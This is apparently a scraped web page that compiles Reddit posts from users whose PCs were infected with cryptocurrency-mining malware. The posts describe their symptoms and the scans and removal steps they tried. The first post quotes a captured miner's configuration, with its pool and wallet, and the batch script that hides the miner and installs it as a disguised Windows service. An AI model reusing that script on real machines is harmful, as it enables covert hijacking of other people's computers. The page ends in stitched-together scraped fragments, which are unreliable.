Bitcoin Miner Virus - Wie man es erkennen und zu entfernen ...

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

At my wit's end with virus removal

So I have at least one virus on my computer. The one I know of is some sort of bitcoin miner, I know this because my gpu usage is constantly at 100% and the fan goes crazy as well as hitmanpro categorizing files with names like bitcoinminer.
I have managed to remove every suspicious file I could find and ran antivirus and antimalware until they couldn't detect anything else but the virus keeps coming back.
The main places I think the virus is focused around are the ~C:\Users\Tony\AppData\Local\Temp~ and ~C:\Users\Tony\AppData\Local\WinSXS~ folders.
I have booted into safe mode, deleted everything in the temp folder, and gave myself permission to delete the WinSXS folder. Every time I boot normally the WinSXS folder just comes back. I know something is up with this folder because rkill always terminates it as well as the other antimalware not liking it.
When I normally boot there is a folder in the temp folder with a name that's just random strings of numbers and letters that I can't delete. It says it's open in another program. I searched the folder name is the resource monitor cpu tab and it was associated with svchost.exe and a couple other things. I'm wondering is the virus is somehow tied to svchost.
So here's a rundown of the steps I've been taking (repeatedly) to try to take care of this.
  1. Boot into safe mode (by switching my psu off then on to get to the boot menu)
  2. Show hidden files and folders
  3. Delete everything from the local\temp folder
  4. Delete unknown files from C:\\ProgramData and C:\Users\User\AppData\Roaming
  5. Remove any weird keys from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  6. Empty Recycle Bin
  7. Run rkill
  8. Run adwcleaner
  9. Run malwarebytes (with rootkit checker)
  10. Run Hitmanpro
  11. Run combofix
  12. Run the trojan remover from https://www.simplysup.com/
  13. Reboot computer normally
  14. Run malwarebytes, watch as it finds the same walwares as a million times before
  15. Listen to my fan speed fluctuate like crazy
  16. Run rkill, it kills a WinSXS process, which does nothing
  17. Cry uncontrollably
So uh, what the hell should I do?
OS: Windows 7
submitted by Froggyfrogger to techsupport [link] [comments]

Bitcoin Miner malware, detected with Malware Bytes but I believe it's still hidden somewhere.

so a few days ago I did something stupid and tried to torrent a game for the first time and ended up installing a Bitcoin Miner onto my PC :/ It was very obvious that it was malware as it quickly seemed to hijack Google Chrome. I scanned with Windows Defender but nothing was found so I checked out the sticky post on here and got a trial of Malware Bytes, which detected the malware and quarantined it, then I removed it. I really thought it was that simple but I think it's still there. I had Spotify playing music on idle and got curious, did CTRL + ALT + DELETE to open up Task Manager and quickly saw my CPU % shoot down from 100% to 2% - %5, which is what it's been sitting at when I'm using it right now.
Other than that, there are a couple of weird things that make me think the virus is still there:
  1. Programs keep getting Suspended status in Task Manager (this is happening to Malware Bytes and Google Chrome), which never used to happen before. This a brand new PC I built in January so it shouldn't be doing this that often. I tried to open Malware Bytes now to scan again and it just froze on "Not Responding" and I can't seem to close it...
  2. There is a strange "Suspended" background process in Task Manager that uses up 3.6MB of memory. Here's a screenshot of what it looks like: http://prntscr.com/lchp1w :(
  3. When I right click ^ "open file location" on the suspended process and the 2 others below it, the location I get is C:\Windows\SysWOW64 and it's titled svchost.exe, which I read is a normal Windows process but there are A LOT of them running in my Task Manager right now
  4. All the other svchost.exes are under C:\Windows\System32, which I read is fine. Does this mean that the one in SysWOW64 is malware/infected?
As per the stickied thread, I ran rkill.com and turned on "scan for rootkits" in my Malware Bytes trial, and also ran the ADWCleaner. I did all of the above after I had originally removed the malware with Malware Bytes, so all these second scans didn't detect anything. Is there anything else I could do to actually detect the malware and remove it?
EDIT: Google Chrome keeps not responding, same with Malware Bytes. Can't uninstall Malware Bytes and Firefox stopped responding too. Writing this on my phone since I turned everything off briefly after writing this post, since my mouse started moving extremely slow and a repetitive beeping sound started coming out of my speakers. I swear it was like whatever infected me detected whenever I looked up information on malware removal and visited this subreddit ...
submitted by rsarector to techsupport [link] [comments]

Insanely high CPU usage from service host DCOM

So this has happened to me for a while but sometimes my computer will just spazz out and completely slow down as a result of Service Host DCOM. Here's the screenshots i've made (no idea why this happens and no idea what they mean so hopefully you guys can help me out).
  1. Screenshot 1 showing basic task manager details
  2. Screenshot 2 when I right click on the offending processes and go to "more details"
  3. Screenshot 3 when I right click on the offending svchost and go to "more details" again
I've ran virus scans(Avast), Malware(Malware Bytes) scans etc and found nothing. This problem has happened to me for ages and it seems completely random. The only time i've had any issues malware wise was a bitcoin miner (SoundMixer) that I got from a torrent I downloaded which has since been resolved but the problem persisted long before I ever had that problem, so I don't think it's the issue.
System specs: * Windows 10 * 8GB Ram * 980 GPU * 4690K CPU
Thanks in advance
submitted by AlphaKennyBody02 to techsupport [link] [comments]

GoogleUpdateService CMD Virus?

Hi, its been more than a year that my PC got infected by some russian adware which everytime opens up some russian website full of scammerous ads in my default browser. It always open up that website exactly after 15 minutes when I boot up the PC, fortunatuly only once per boot season. Now I've finaly got rid of it, mainly because I downloaded some file that was filled with more russian adware, that set some russian site as a home page in all of my browsers, then probably a bitcoin miner I recon, because after that svchost.exe was using 50% of my CPU the whole time.
So I installed good ol Malwarebytes, ran full scan, found malwares and bunch of infected files and registries, quarantined em all and finaly no annoying russian pop ups and bitcoin miner.
However after a while when I boot up, a CMD window pops up in the background, which contain some lines, sayin its GoogleUpdateService and downloadin some stuff and after when its finished with downloading, Malwarebytes quarantines it.
Is it really the Google Update Service, which by weird coincidence started to pop up, after I finaly cleaned my PC with Malwarebytes, or is it as I recon some remaining rusky virus?
Malwarebytes quarantines the following two files after that:
Adware.File.Tour - C:\Users\Exelzior\AppData\Local\Temp\GoogleUpdate_203093539.exe Riskware.Tool.CK - C:\Windows\KMSEmulator.exe
submitted by MrExelzior to techsupport [link] [comments]

[BitCoin Miner Virus] Need assistance in it's removal.

Hi All,
I am a fully qualified Support Tech and have managed to download myself a BitCoin Miner Virus (or what I believe to be) on my Personal/Gaming computer.
How: Torrented FIFA 15, Installed It, Issues Ensued.
What: There are 2 processes that start up on boot, they are disguised as system processes:
svchost.exe
lsass.exe
They are located in the C:\Windows\Temp folder. I can kill the processes without issue and remove the .exe files, but they return on boot.
What Do They Do:
svchost.exe = runs CPU at 75%
lsass.exe = run GPU at 100%
I disconnected the internet to see if it was a BitCoin miner but they stayed @ 100%. Possibly disguising what they actually are.
What Have I Done So Far Result
Killed Processes, Deleted .EXE Processes die without issue and .EXE's delete immediately, but they return on Reboot.
Ran Malwarebytes... twice Located the problem .EXE files and removed them, also located some more versions located in IExplore/Temp directory and deleted but issue is persistant
Found and Removed Suspect Registry Entries There werent many but I search for SVCHOST and LSASS and located afew registry entries attached to FIFA15 installation keys and removed them
Followed Steps on this Reddit Entry: http://bit.ly/1GNgUaZ Shortened URL for Formatting Purposes But the processes and .EXE files dont match and the registry key isn't found in the suggested location
Help me Obi-Wan Kenobi.... You're my only hope.
submitted by hackthefortress to techsupport [link] [comments]

Need assistance removing the most pesky malware I've ever come across.

System specs:
(genuine)Windows 8.1
i5 3570K
8 GB RAM
GTX 760
No overclocking.
Upon starting my computer, this always happens:
Gee. I wonder who the culprit is
More info on this little shit
The file is svchost.exe and is located in the Windows/temp folder. This is obviously the malware. So I run a scan with Malwarebytes and it detects it as a bitcoin miner. I property delete it and it's all fine. But if I turn off my computer completely, it will come back in the same place. This virus causes my computer to be laggy and unusable for gaming.
I've tried Adwcleaner, Windows Defender, and Rkill. Same results on them all.
I downloaded hijackthis but I don't know how to use it. Any help on this would be awesome.
submitted by BearOnDrums to techsupport [link] [comments]

Used Malwarebytes to remove bitcoin miner trojan, PC stuck at startup repair.

I noticed I was getting ridiculously high cpu usage when I was idle, caused by svchost.. I checked around for a bit and decided to run MBAM to see if it was a virus. Lo and behold it found a bitcoin miner trojan. I had it delete the infected files. Computer is now stuck at startup repair and has been going for about an hour and a half.
Using Windows 7 Ultimate, and I don't think it matters but I'm running a Z97X mobo, i7-4790k and a 550ti.
submitted by Instincthr to techsupport [link] [comments]

How To Remove #scvhost.exe Virus Form Your Pc By DevTechz tutorial: Bitcoin mining with CGMiner - YouTube Remove bitcoin miner trojan Virus (Virus Removal Guide ... How to Find and Remove a Hidden Miner Virus on Your PC 🐛🛡️🖥️ How to remove Bitcoin Miner virus

Plagegeister aller Art und deren Bekämpfung: Virus(bitcoinminer) durch svhost.exe Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie ... As i had a bitcoin mining virus before, i rememberred the same symptom and did some things: Combo fix: I ran it once and it seemed to fix my problem until i restartet. Kaspersky: Was unable to do anything but recognise the virus. I tried the secure Disc but it couldn't get rid of the virus. Malwarebytes: It found two svchost.exe and two lsass ... Page 1 of 2 - Trojan.Agent.Mnr (Bitcoin Miner) running fake svchost.exe and lsass.exe - posted in Virus, Trojan, Spyware, and Malware Removal Help: Hello, my PC has been infected by this Trojan. BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ... Der BitCoin Miner-Virus oder der BitCoin Mining-Virus ist eine gefährliche Malware, die möglicherweise Ihre CPU und / oder GPU verwendet, um die BitCoin-Kryptowährung durch illegales Mining abzurufen. Cryptocurrency Miner greifen immer wieder auf Computer zu und versuchen, mit ihren Ressourcen Einnahmen für ihre Entwickler zu generieren. Obwohl diese Art der Infektion BitCoinMiner heißt ...

[index] [16524] [41418] [22379] [35912] [3624] [12261] [39040] [1151] [25011] [14533]

How To Remove #scvhost.exe Virus Form Your Pc By DevTechz

👍 Watch how to remove a hidden Bitcoin mining virus from your computer. If you noticed that your computer – while you’re not using it - still behaves as if i... Bitcoin Miner is a spy utility that is embedded in your PC and spend resources on completing your computation tasks and earnings E- Currency - Bitcoin comrade . On your PC , and calculated numbers ... Remove bitcoin miner trojan Virus (Virus Removal Guide) Visit Site :- https://www.uninstallallpcvirus.com/remove-bitcoin-miner-trojan-virus-virus-removal-gui... How to Remove Trojan:Win32/CoinMiner Virus Manually ( SYS64/Starter.exe and Driver.exe ) How to Find and Remove a Hidden Miner Virus on Your PC 🐛🛡️🖥️ - Duration: 9:08. Hetman Recovery 40,059 views. 9:08 . How to remove a computer virus / malware - Duration: 5:27. The ...

#